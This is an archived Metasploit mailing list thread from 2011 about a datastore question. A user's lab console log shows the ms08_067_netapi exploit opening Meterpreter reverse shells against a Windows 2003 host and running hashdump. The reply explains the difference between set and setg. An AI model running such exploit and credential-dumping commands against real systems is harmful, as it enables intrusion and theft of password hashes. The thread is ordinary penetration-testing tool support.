Metasploit mailing list archives

Re: [RHOST] bug ?


From: Joshua Smith <lazydj98 () gmail com>
Date: Thu, 20 Oct 2011 09:07:27 -0400

No, just use set the second time instead of setg. The global datastore is used if there's nothing in the local store, 
which is the case in your scenario. 

-Josh

On Oct 20, 2011, at 4:16 AM, cons0ul <sachinshinde11 () gmail com> wrote:

msf  exploit(ms08_067_netapi) > version
Framework: 4.1.0-release.13988
Console  : 4.1.0-release.13581

:)

On Thu, Oct 20, 2011 at 1:43 PM, cons0ul <sachinshinde11 () gmail com> wrote:
Hi ,

I was just testing smb exploits in our testing lab and this is what i did


msf  exploit(ms08_067_netapi) > setg RHOST 192.168.1.61
RHOST => 192.168.1.61
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.7:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.61
[*] Meterpreter session 1 opened (192.168.1.7:4444 ->
192.168.1.61:1977) at 2011-10-20 13:32:46 +0530

meterpreter > hashdump
meterpreter > background
msf  exploit(ms08_067_netapi) > setg RHOST 192.168.1.62
RHOST => 192.168.1.62
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.7:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.61
[*] Meterpreter session 2 opened (192.168.1.7:4444 ->
192.168.1.61:1978) at 2011-10-20 13:33:56 +0530


is it a bug ?

thanks,
cons0ul

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: